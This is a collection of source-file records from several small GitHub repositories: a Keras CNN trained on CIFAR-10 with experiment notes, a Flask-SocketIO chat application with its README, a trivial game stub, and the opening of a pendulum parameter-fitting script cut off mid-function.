y_train, X_val, y_val, epochs,avg_per_channel)\n\tprint(hist.history)\n\n\t# test the model\n\tpred = engine.predict(model,X_test,y_test)\n\taccuracy=engine.compute_accuracy(pred,y_test)\n\tprint('accuracy on test data: ',accuracy*100, '%')\n\tshow_results(pred,X_test,y_test)\n\n\t# save learned weights\n\tf=\"%d-%m-%y\"\n\tfilename='record/weights-'+dt.date.today().strftime(f)\n\tmodel.save_weights(filename,overwrite=True)\n\n\tpl.plot(hist.history,len(hist.history['acc']))\n\tos.system('./plot.sh')\n\n\nif __name__ == \"__main__\":\n main()\n\n\n"
},
{
"alpha_fraction": 0.7660427689552307,
"alphanum_fraction": 0.7874331474304199,
"avg_line_length": 40.5,
"blob_id": "d550f1bf3a8935b3b423cadc0fdf9e114d3bf388",
"content_id": "16fe30675ceb660f4fed9960458d6d9be42ae24b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 748,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 18,
"path": "/README.md",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "this an all convolutional CNN using the cirfar10 dataset\nas of 17092016 performance, without regularization is : accuracy 92% validation 82% (so, overfitting)\n\nthe files are :\n- convnet3.py runs the keras model, started by learn.sh\n- modelallcnn.py the keras model\n- trace.py a keras callback for tracing activation values in case of NaN\n- imageutils.py image utilities\n- plot.py plot accuracy during training (used by plot.sh)\n- plot.sh plot accuracy\n- learn.sh start training, an optional first argument would be a saved weight files for restarting training from a saved point in time\n\nmodification log :\n- shuffle batch samples using skleanr shuffle()\n- set a small lambda for L2 regularization\n\nfuture modifications :\n- recheck input dataset\n\n"
},
{
"alpha_fraction": 0.575419008731842,
"alphanum_fraction": 0.5810055732727051,
"avg_line_length": 28.66666603088379,
"blob_id": "6ba5b27b2de52e4ff1bbd0c5f8a5fc8480881815",
"content_id": "4631d8fcc779d3f029a589dc2367a82284d0e836",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 6,
"path": "/plot.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "\ndef plot(history,size):\n\tf=open('plot.data','w')\n\tfor i in range(0,size):\n\t\tline=str(i)+' '+str(history['acc'][i])+' '+str(history['val_acc'][i])+'\\n'\n\t\tf.write(line)\n\tf.close()\n"
},
{
"alpha_fraction": 0.36090224981307983,
"alphanum_fraction": 0.4060150384902954,
"avg_line_length": 19.461538314819336,
"blob_id": "7e2c2a1167cf7277cbed873648f410cb5e5ed190",
"content_id": "4d08fb457f36dc69b269a0fb8f401eab00300194",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 266,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 13,
"path": "/cifar10labels.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "\n'''CIFAR 10 labels recorded here from their homepage'''\n\nlabels={\n0:'airplane',\t\t\t\t\t\t\t\t\t\t\n1:'automobile',\t\t\t\t\t\t\t\t\t\t\n2:'bird',\t\t\t\t\t\t\t\t\t\t\n3:'cat',\t\t\t\t\t\t\t\t\t\t\n4:'deer',\t\t\t\t\t\t\t\t\t\t\n5:'dog',\t\t\t\t\t\t\t\t\t\t\n6:'frog',\t\t\t\t\t\t\t\t\t\t\n7:'horse',\t\t\t\t\t\t\t\t\t\t\n8:'ship',\t\t\t\t\t\t\t\t\t\t\n9:'truck'}"
},
{
"alpha_fraction": 0.5049889087677002,
"alphanum_fraction": 0.6583518385887146,
"avg_line_length": 31.39521026611328,
"blob_id": "fd058c57fd20b5134ab8e9f138410fd8b9c4c572",
"content_id": "2c80381def83aec3d07d0dba6a59c5624bf73227",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 5414,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 167,
"path": "/notes.txt",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "todo :\n- reduce learning rate\n- NanGuardMode\n- close opened images use ion()\n- data augmentation : tra\tnslation, then affine (rotation, distortion) by keras\n\n\nmean of all pixels is slightly dependant of color, as well as std dev\n- substract mean per sample per color\n- do not correct variance\n- apply pca whitening\n- if using pca goal is to retain 99% variance (probably not applicable here)\n-> next understand numpy eigenvectors\n\nmean+variance per sample :\nEpoch 56/100\n45000/45000 [==============================] - 152s - loss: 0.6540 - acc: 0.7718 - val_loss: 0.7994 - val_acc: 0.7390\nEpoch 57/100\n45000/45000 [==============================] - 152s - loss: 0.6495 - acc: 0.7738 - val_loss: 0.7852 - val_acc: 0.7456\nEpoch 58/100\n45000/45000 [==============================] - 152s - loss: 0.6392 - acc: 0.7766 - val_loss: 0.7757 - val_acc: 0.7462\nEpoch 59/100\n45000/45000 [==============================] - 152s - loss: 0.6341 - acc: 0.7796 - val_loss: 0.7790 - val_acc: 0.7384\nEpoch 60/100\n45000/45000 [==============================] - 152s - loss: 0.6269 - acc: 0.7821 - val_loss: 0.7757 - val_acc: 0.7376\nEpoch 61/100\n45000/45000 [==============================] - 152s - loss: 0.6244 - acc: 0.7807 - val_loss: 0.7637 - val_acc: 0.7498\nEpoch 62/100\n45000/45000 [==============================] - 155s - loss: 0.6176 - acc: 0.7823 - val_loss: 0.7597 - val_acc: 0.7464\n\n76%\n\nnumpy PCA : sigma = x.dot(x.T) uses too much memory\n\ninit he_normal\nEpoch 1/1\n45000/45000 [==============================] - 476s - loss: 1.7333 - acc: 0.3760 - val_loss: 1.5369 - val_acc: 0.4894\naccuracy on test data: 48.3 %\nprediction: truck actual value: truck\n>>> \nYvess-MacBook-Pro:keras yves$ python\n\nretest without leaky relu : 0.3 -> 0.0.3 worse\ntune dropout according to 2014 article\naugmentation\nmore maps\nmax_norm value 3 or 4\n\n128 maps base\nbatch 128\nlambda 0.03\n100 epochs\ndropout 0.1 02 0.3 0.4\nepoch 38 90% 80% overfit\nepoch 96 95% 80% overfit\nepoch 100 97,5% 80% overfit\n\nset dropout to 0.5 0.5 0.5 0.5\nepoch 16 both at 15%\n\nset dropout to 0.3 0.3 0.3 0.3\nsame as 0.1 0.2 0.3 0.4 95% 78% at epoch 72\n\nset dropout 0.4 0.4 0.4 0.4 0.4\ntest: 76.4% fit 90.5%\n\nregularization L2 54% on test data on 50 batches 67% on train\n\nlooking at VGG on ILSVRC 2014\n- no leaky relu\n- L2 multiplier = 0.0005, dropout on first two FC layers, learning rate 0.01\n- size of maps multiplied by 2 each convolution\n- convolution layer padding 1 -> border same\n\n97,5% 82% 50 epoch\n\nadd little L2\n\nacc train 99% test 80%\n\nnext : try convnet, introduce generator for augmentation (compute validation data first)\nsmaller FC ?\naugmentation set for training, not yer for testing\n\n45000/45000 [==============================] - 252s - loss: 1.6781 - acc: 0.8650 - val_loss: 0.4319 - val_acc: 0.8520\nEpoch 50/50\n45000/45000 [==============================] - 252s - loss: 1.6670 - acc: 0.8634 - val_loss: 0.4311 - val_acc: 0.8474Using Theano backend.\nUsing gpu device 0: GeForce GT 730 (CNMeM is disabled, cuDNN 5004)\n\naccuracy on test data: 83.99 %\n\n16/06 : batches 100, augmentation translation 0.2, rotation none, test : 86.6 % , train : 88.16%\n\noptions :\n- rotation augmentation\n- batch normalization -> is key because we could avoid dropout and use sigmoids\n- additional convnet layer \n\nwith rotation, results are slightly better (dropout=0 0 0 0 0.5 0)\n45000/45000 [==============================] - 274s - loss: 1.3343 - acc: 0.8274 - val_loss: 0.4096 - val_acc: 0.8576\naccuracy on test data: 85.17 %\n\nwith batch normalization:\n45000/45000 [==============================] - 1357s - loss: 0.7389 - acc: 0.8576 - val_loss: 0.3976 - val_acc: 0.8644\nEpoch 45/100\n\nEpoch 55/100\n44800/45000 [============================>.] - ETA: 2s - loss: 0.7926 - acc: 0.8334Epoch 00054: early stopping\n45000/45000 [==============================] - 640s - loss: 0.7927 - acc: 0.8334 - val_loss: 0.4275 - val_acc: 0.8516Using Theano backend.\nUsing gpu device 0: GeForce GT 730 (CNMeM is disabled, cuDNN 5004)\n85%\n\n-----------------\nZeroPadding2D\none conv layer removed\ndropout, no batch normalization\n10 epoch 66%\n\n82.%\n\n-- rollback to 1606\nreinstate early stopping\n\n128 maps base\n88.% test accuracy after 100 epochs, best result so far, save as convnet.py 26062016\n\nuse network input size larger than image ?\nuse fmp ?\nThe learning rate γ was adapted using a schedule S = e1 , e2 , e3 in which γ is multiplied by a fixed multiplier of 0.1 after e1.e2 and e3 epochs respectively.\n\ntodo : implement numpy.append to limit memory usage\nnext : try all convnet\nintroduire l augmentation sur le test set\n\n88% 05072016\n87.9% 070072016\n\ndebug modelallcnn (flatten)\ncommit convnet.py on github\n\nzca?\nlearning_rate ?\nbatch normalization ?\n\naccuracy on test data: 87.27 %\n16072016\n\nalso there is now a memory overflow on the GPU, maybe activate memory management by Ubuntu\nmust improve structure : display_normalized_image inverses scale\n\ntry to output a statistic of layer weights per layer to trace computation errors\n\nTRY GRADIENT CLIPPING\ntry keras stride instead of subsampling\n---\neven with gradient clipping, first batch\n\nwhen early stopping, there is an error on the number of elements in history\n\nEpoch 200/200\n======] - 1003s - loss: 0.2308 - acc: 0.9191 - val_loss: 0.6928 - val_acc: 0.8223\noverfit : accuracy 92% validation 82% with lamba=0\n\nset GPU at max speed by default\n\n17/092016\nloss: 0.3317 - acc: 0.9011 - val_loss: 0.4386 - val_acc: 0.8664\n\n\n"
},
{
"alpha_fraction": 0.7245227694511414,
"alphanum_fraction": 0.7553597688674927,
"avg_line_length": 49.07352828979492,
"blob_id": "c1ea7082e936f57f99edbca497a2d1001c348193",
"content_id": "7e71b1b68612e6baa55fd535d1ee4c83d0f0fdb5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3405,
"license_type": "no_license",
"max_line_length": 160,
"num_lines": 68,
"path": "/modelallcnn.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "# adapted from keras examples\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Reshape\nfrom keras.layers import Convolution2D, MaxPooling2D, AveragePooling2D\nfrom keras.optimizers import SGD\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.regularizers import l2, activity_l2\nfrom keras.layers.advanced_activations import LeakyReLU\n\ndef make_model(input_size):\n\n\tmaps_count_param=24 # a higher value like 96 ends up with a Nan loss on GPU\n\tlambda_param=0.00001 # a very low value since we have so much parameters\n\talpha_param=0.3\n\n\t''' define the model'''\n\tmodel = Sequential()\n\n\tmodel.add(Convolution2D(maps_count_param, 3, 3, border_mode='same', input_shape=(3, input_size, input_size),init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.1))\n\tmodel.add(Convolution2D(maps_count_param, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.2))\n\t#model.add(BatchNormalization(mode=1))\n\n\tmodel.add(Convolution2D(maps_count_param*2, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*2, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*2, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.3))\n\t#model.add(BatchNormalization(mode=1))\n\n\tmodel.add(Convolution2D(maps_count_param*3, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*3, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*3, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.4))\n\t#model.add(BatchNormalization(mode=1))\n\n\tmodel.add(Convolution2D(maps_count_param*4, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*4, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Convolution2D(maps_count_param*4, 3, 3, border_mode='same', init='orthogonal', W_regularizer=l2(lambda_param),subsample=(2,2)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dropout(0.5))\n\t#model.add(BatchNormalization(mode=1))\t\n\n\t#print('model characteristics:',model.summary())\n\n\tmodel.add(Flatten())\n\n\tmodel.add(Dense(maps_count_param*16, W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\tmodel.add(Dense(maps_count_param*2, W_regularizer=l2(lambda_param)))\n\tmodel.add(LeakyReLU(alpha=alpha_param))\n\n\tmodel.add(Dense(10, W_regularizer=l2(lambda_param)))\n\tmodel.add(Activation('softmax'))\n\n\treturn model\n"
},
{
"alpha_fraction": 0.6139847040176392,
"alphanum_fraction": 0.6393678188323975,
"avg_line_length": 25.392404556274414,
"blob_id": "854df4d583cfed1e91e28d2d21986eca65aa2854",
"content_id": "88b5b05bc4ece203158e3e78308da9a39f8aac2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2088,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 79,
"path": "/imageutils.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nimport numpy as np\n\ndef unpickle(file):\n import pickle\n fo = open(file, 'rb')\n dict = pickle.load(fo, encoding='bytes')\n fo.close()\n return dict\n\ndef display_image(im1,image_size):\n\tim1=im1.reshape((3,image_size,image_size)).transpose(1,2,0)\n\timg = Image.fromarray(im1, 'RGB')\n\timg.show()\n\ndef display_normalized_image(image,image_size,avg_per_channel):\n\tim1=image\n\tfor i in range(0,3):\n\t\tim1[i,:,:] = image[i,:,:] * 128 + avg_per_channel[i]\n\tdisplay_image(im1.astype('uint8'),image_size)\n\ndef load_dataset():\n\tdict={}\n\tfor i in range(1,6):\n\t\tdict1=unpickle('/Users/yves/.keras/datasets/cifar-10-batches-py/data_batch_'+str(i))\n\t\tdict.update(dict1)\n\n\tY_train=dict[b'labels']\n\tX_train=dict[b'data']\n\n\tprint (X_train.shape)\n\t#for k in range(0,X_train.shape[0]):\n\t#\tX_train[k] = reshape(X_train[k])\n\n\tdisplay_image(X_train[0])\n\tdisplay_image(X_train[1])\n\tdisplay_image(X_train[2])\n\n\treturn (X_train,Y_train)\n\ndef normalize(data):\n\tm=np.mean(data)\n\ts=np.std(data)\n\treturn (data-m)/s\n\ndef mean1(data):\n\t''' substract mean per image sample and per color channel'''\n\tfor i in range(0,data.shape[0]):\n\t\tfor j in range(0,data.shape[1]):\n\t\t\tm = np.mean(data[i,j,:])\n\t\t\tdata[i,j,:,:] = data[i,j,:,:]-m\n\treturn data\n\n\n\ndef mean2(data1,data2,data3):\n\t''' substract mean per color channel for training set data1 from all datasets'''\n\tfor j in range(0,data1.shape[1]):\n\t\tm = np.mean(data1[:,j,:])\n\t\tdata1[:,j,:,:] -= m\n\t\tdata2[:,j,:,:] -= m\n\t\tdata3[:,j,:,:] -= m\n\treturn data1, data2, data3\n\ndef whiten(data,epsilon):\n\t''' ZCA whiten per channel '''\n\tn=data.shape[0]\n\tp=data.shape[2] # width of an image ; here we assume square images\n\tfor j in range(0,data.shape[1]): #enumerate color channels\n\t\tx = data[:,j,:,:].reshape(n,p*p) \t\t\t\t\t\t\t\t# x(imagePixels),sample#)\n\t\tprint('before sigma',x.shape)\n\t\tsigma = x.dot(x.T) \n\t\tprint('after sigma\\n')\n\t\tsigma /=n\n\t\tu,s,v = np.linalg.svd(sigma)\n\t\txWhite = np.diag(1./np.sqrt(s + epsilon)).dot(u.T).dot(x)\t\t# compute PCA\n\t\txWhite = u.dot(xWhite) \t\t\t\t\t\t\t\t\t\t\t# compute ZCA\n\t\tdata[:,j,:,:]=xWhite.reshape(n,p,p)\n\treturn data\n\n\n\n"
},
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6973684430122375,
"avg_line_length": 27.375,
"blob_id": "0972656723ee08fd201aa385063e708ffa64c6e1",
"content_id": "fbe2e37173d34f20d43323d7b432921386b161be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 228,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 8,
"path": "/learn.sh",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "timestamp=`date +%d%m%y-%H%M%S`\nfilename=record/test$timestamp.log\ntouch $filename\npidfile=`hostname`.pid\nkill `cat $pidfile`\npython convnet3.py 200 $timestamp ${1:-NO} >> $filename 2>&1 & \necho $! > $pidfile\ntail -f $filename\n\n"
},
{
"alpha_fraction": 0.6633663177490234,
"alphanum_fraction": 0.7029703259468079,
"avg_line_length": 19.200000762939453,
"blob_id": "576c01866162c73b627d18f16e505254625f4ca3",
"content_id": "e6392c2f29a4554fc5a2f80dbaeb6c898bb8053f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 5,
"path": "/plot.sh",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "gnuplot --persist << FIN\nset key left top\nplot \"plot.data\" using 1:2, \"plot.data\" using 1:3\nexit\nFIN\n"
},
{
"alpha_fraction": 0.6430910229682922,
"alphanum_fraction": 0.6476751565933228,
"avg_line_length": 40.297298431396484,
"blob_id": "bfd3d2aa0d7ca17980e28ef8c1fe4a06a6cfc73c",
"content_id": "de3c625a33e3fb17fa63172f2cb86113325a6ae7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 37,
"path": "/trace.py",
"repo_name": "ybenigot/all-convolutional-cnn-keras",
"src_encoding": "UTF-8",
"text": "from keras.callbacks import Callback\nfrom keras import backend as K\nimport numpy as np\n\nclass TraceWeights(Callback):\n\n\tdef __init__(self,mode,engine):\n\t\t''' mode should be 0 for training, 1 for testing , engine is used to get current batch data'''\n\t\tself.mode = mode\n\t\tself.engine = engine\n\n\tdef on_train_begin(self, logs={}):\n\t\tprint('train begin')\n\n\tdef print_ndarray_stats(self, s, i, X):\n\t\t''' i layer number,\n\t\t\ts data name,\n\t\t\tX data array '''\n\t\t#print(\"layer \",i, s, \" shape : \", X.shape,\" max : \", np.amax(X),\" min : \",np.amin(X),\" avg : \", np.mean(X)\\\n\t\t#\t\t ,\"NaN count : \", np.count_nonzero(np.isnan(X)), \"non Nan count : \", np.count_nonzero(~np.isnan(X)) )\n\t\tprint(\"L:\",i, \":\",s, \":\", X.shape,\":\", np.amin(X),\":\",np.amax(X),\":\", np.mean(X),\":\", \\\n\t\t\t np.count_nonzero(np.isnan(X)), \":\", np.count_nonzero(~np.isnan(X)) )\n\n\tdef on_batch_begin(self, batch, logs={}):\n\t\t''' on batch begin we display the statistics of the weights and the outputs to see how NaN propagate '''\n\t\tnumber_of_layers= len(self.model.layers)\n\t\tfor i in range(1,number_of_layers):\n\t\t\tweights=self.model.layers[i].get_weights()\n\t\t\tif len(weights)>0:\n\t\t\t\tself.print_ndarray_stats(\"W\", i,abs(weights[0]))\t# trace gradient scale\n\t\t\tget_layer_output = K.function([self.model.layers[0].input,K.learning_phase()],[self.model.layers[i].output])\n\t\t\tX = self.engine.X_batch_current\n\t\t\tlayer_output = get_layer_output([X,self.mode])[0]\n\t\t\tself.print_ndarray_stats(\"Y\", i,abs(layer_output))\t\t# trace activation scale\n\n\n#IDEA : use a much smaller lambda"
}
] | 10 |
qmpython/Games | https://github.com/qmpython/Games | 749e642f48cffac98a8533371da8de124103e8e9 | 06e825b4e85241b14f8249ab3a45d0c9bb14183a | f0b25c59ad39c7738f92c0a7ad9a839e101f62a1 | refs/heads/master | 2021-05-18T10:39:46.821422 | 2020-03-30T04:13:26 | 2020-03-30T04:13:26 | 251,214,270 | 1 | 0 | null | 2020-03-30T05:53:26 | 2020-03-30T05:56:35 | 2020-03-30T13:19:00 | Python | [
{
"alpha_fraction": 0.4383561611175537,
"alphanum_fraction": 0.4383561611175537,
"avg_line_length": 9.428571701049805,
"blob_id": "add91ecf7b4fc1dc9503c9e83e873bec7063964a",
"content_id": "4ae4d60b8e786294dade835a7217aa837fc3a107",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 7,
"path": "/main.py",
"repo_name": "qmpython/Games",
"src_encoding": "UTF-8",
"text": "def game():\n print(\"游戏开始开发\")\n\n\n\nif __name__ == '__main__':\n game()\n"
}
] | 1 |
maguilera0810/project2 | https://github.com/maguilera0810/project2 | 19edecad350a8b783fe86726ca89dcc75d8cb5b3 | 006d84de0b03ffd8c538f8393c8f72ce120641f6 | 0c5c613812a2ad149092648fcda803b8bbee6e3e | refs/heads/master | 2020-09-30T05:09:18.223100 | 2019-12-29T07:24:09 | 2019-12-29T07:24:09 | 227,211,431 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.739847719669342,
"alphanum_fraction": 0.7430202960968018,
"avg_line_length": 36.5476188659668,
"blob_id": "ca2052cd7f1b446b35504c88e917bcbbce4bb8e5",
"content_id": "4d61960ad5c2beaf798fdf0aa11090085194d31f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1576,
"license_type": "no_license",
"max_line_length": 122,
"num_lines": 42,
"path": "/README.md",
"repo_name": "maguilera0810/project2",
"src_encoding": "UTF-8",
"text": "# Project 2\n\nWeb Programming with Python and JavaScript\n\nWelcome to Project 2: Flack\n\nYoutube:\n https://youtu.be/OEyTyKZ_kgI\n\nStructure:\n\nStatic directory:\n \n -index.js: file. This file contains functions related to the socket connection.\n There are also a couple of functions which were created to obtain the date in a readable format.\n \n -css/style2.css: This file contains all styles of mi project\n \n -images: This folder contains all images of the project\n\n\nTemplates directory:\n\n - channels.html: This page appears when a channel is selected by some user so he/she can type \n and submit a message into the channel.\n\n - index.html: It corresponds to the main page. Here the user is able to create a new channel or to start a private\n chat with an specific user.\n\n - logged.html: At this html the registration of an username is confirmed. This page appears only 1.5 seconds \n and then the user is redirected to the main page.\n\n - register.html: It shows a register form.\n\n\napplication.py: This file ontains all of the logic on the server side.\n\nPersonal touch: As an additional feature, I placed the messages of the current user on the right and the messages \nof other users on the left, and set a random color for each user when logging in. In addition, I implemented a logout.\n\nPersonal touch: as an additional feature, I placed the messages of the current user on the right and the messages\nfrom other users on the left, and I set a random color for each user when signing in. In addition, I implemented a logout."
},
{
"alpha_fraction": 0.5257879495620728,
"alphanum_fraction": 0.5412607192993164,
"avg_line_length": 26.91200065612793,
"blob_id": "e786a3da298b2c661506d5f7098483c5e8f6130c",
"content_id": "3ca615236732063fe4549ebfed763a0cc0cab959",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3490,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 125,
"path": "/application.py",
"repo_name": "maguilera0810/project2",
"src_encoding": "UTF-8",
"text": "\nimport os\nfrom random import randint\n\n\nfrom flask import Flask, render_template, jsonify, request, redirect, url_for, session\nfrom flask_session import Session\nfrom flask_socketio import SocketIO, emit\nfrom flask_cors import CORS, cross_origin\n\n\napp = Flask(__name__)\n\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\napp.config[\"SECRET_KEY\"] = os.getenv(\"SECRET_KEY\")\napp.config['CORS_HEADERS'] = 'Content-Type'\nSession(app)\n\ncors = CORS(app)\nsocketio = SocketIO(app)\n\n\nhexa = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\",\n \"8\", \"9\", \"A\", \"B\", \"C\", \"D\", \"E\", \"F\"]\n\nchannels_multi = []\nchannels = []\nusers = []\ninicio = True\nmsg = {\"asdf\": [\"hola como estas?\", \"bien y tu\", \"cuando y donde?\", \"bien y tu\",\n \"cuando y donde?\", \"bien y tu\", \"cuando y donde?\", \"bien y tu\", \"cuando y donde?\"]}\n\n\ndef random_color():\n c = \"#\"\n for i in range(6):\n c += hexa[(randint(0, 1000)*randint(0, 1000) +\n randint(0, 500)*randint(0, 500)) % len(hexa)]\n return c\n\n\[email protected](\"/\", methods=[\"POST\", \"GET\"])\ndef index():\n codigo = 1\n\n if request.method == \"POST\":\n channel = request.form.get(\"channel_name\")\n if (channel not in channels):\n channels_multi.append((channel, session['user'], session['color']))\n channels.append(channel)\n msg[channel] = []\n else:\n codigo = 420\n return render_template(\"index.html\", channels=channels_multi, codigo=codigo)\n\n\[email protected](\"/logout\")\ndef logout():\n users.remove(session[\"user\"])\n session.clear()\n return redirect(url_for(\"index\"))\n\n\[email protected](\"/register\", methods=[\"POST\", \"GET\"])\ndef register():\n codigo = 1\n print(session, \"/////////////SESSION\")\n if 'user' in session:\n print(\"--------------------------------qqqqqqqqqqqqqqqqqqqqq\\n-----------\")\n redirect(url_for(\"index\"))\n elif request.method == \"POST\":\n user = request.form.get(\"nickname\")\n if (user not in users):\n users.append(user)\n session[\"user\"] = user\n # session[\"color\"] = colores[randint(0, len(colores)});-1)]\n #session[\"color\"] = colores[i[0] % len(colores)]\n session[\"color\"] = random_color()\n print(session, \"------\\n----\")\n\n return render_template(\"logged.html\", user=user, color=session[\"color\"])\n else:\n codigo = 69\n return render_template(\"register.html\", users=users, codigo=codigo)\n\n # if request.method == \"GET\":\n # return render_template(\"register.html\")\n # else:\n # return redirect(url_for('index'))\n\n\[email protected](\"/channel/<string:channel>\", methods=[\"GET\"])\ndef channel_creation(channel):\n try:\n return render_template(\n \"channels.html\",\n channel=channel,\n msg=msg[channel],\n user=session[\"user\"]\n )\n except:\n print(\"-------------------------\")\n\n return redirect(url_for('index'))\n\n\[email protected]('send message')\ndef newMessage(msg2):\n if (len(msg[msg2['channel']]) == 100):\n msg[msg2['channel']].pop(0)\n msg[msg2['channel']].append(msg2)\n\n print(msg2, \"*************************************\")\n emit(\n \"new message\",\n {\n \"mensaje\": msg2['mensaje'],\n \"username\": msg2['username'],\n \"date\": msg2['date'],\n \"channel\": msg2['channel'],\n \"color\": msg2['color']\n\n },\n broadcast=True\n )\n"
}
] | 2 |
ShuowangHe/IIB-Project2 | https://github.com/ShuowangHe/IIB-Project2 | c68a59c4f9a15f7148735923a06a8b1f32a90b5b | d0fe8c00ace56c32b45356b5806738d734349642 | 24f5570e03d2e9f44907f9f908278d247bfd3c13 | refs/heads/master | 2022-12-26T23:27:52.287096 | 2020-05-27T12:28:23 | 2020-05-27T12:28:23 | 244,227,033 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6365240216255188,
"alphanum_fraction": 0.6726952195167542,
"avg_line_length": 29.226667404174805,
"blob_id": "10c56eeb8ecea195519e9ef6793d8edd3e17c95b",
"content_id": "775075882b84617b41b019264e5445ed9ca7818d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2267,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 75,
"path": "/param_optimiser.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.signal import find_peaks\nfrom scipy.optimize import fmin_bfgs\nfrom matplotlib import animation\n\nfile = '/Users/shuowanghe/github/IIB-Project/test.csv'\ndata = genfromtxt(file,delimiter=',')\ntimestamps = data[:,0]\na_r = data[:,1]\na_theta = data[:,2]\ntheta_dot = data[:,3]\n#get max theta dot points to get theta=0 points\ntheta_zeros,_ = scipy.signal.find_peaks(abs(theta_dot),prominence=0)\nprint(timestamps[theta_zeros])\nfirst_theta_zero_idx = theta_zeros[1]\ntimestamps_trunc1 = timestamps[first_theta_zero_idx:]\ntheta_dot_trunc1 = theta_dot[first_theta_zero_idx:]\ntheta_measured = scipy.integrate.cumtrapz(theta_dot_trunc1,timestamps_trunc1)\ntimestamps_trunc1 = timestamps_trunc1 - timestamps_trunc1[0]\n\nydata = np.gradient(theta_dot,timestamps)\n\nm = 0.4\ng = 9.81\nl = 0.39\nJ = 1\nfric = 0.08\npopt = np.array([m,l,J,fric])\ndt = 1/50\ntime_elapsed = 20\ntheta = np.zeros(int(time_elapsed/dt))\ntheta[0] = theta_measured[0]\ntheta[1] = theta_measured[1]\nT = np.zeros(int(time_elapsed/dt))\n\ndef func(params,*args):\n 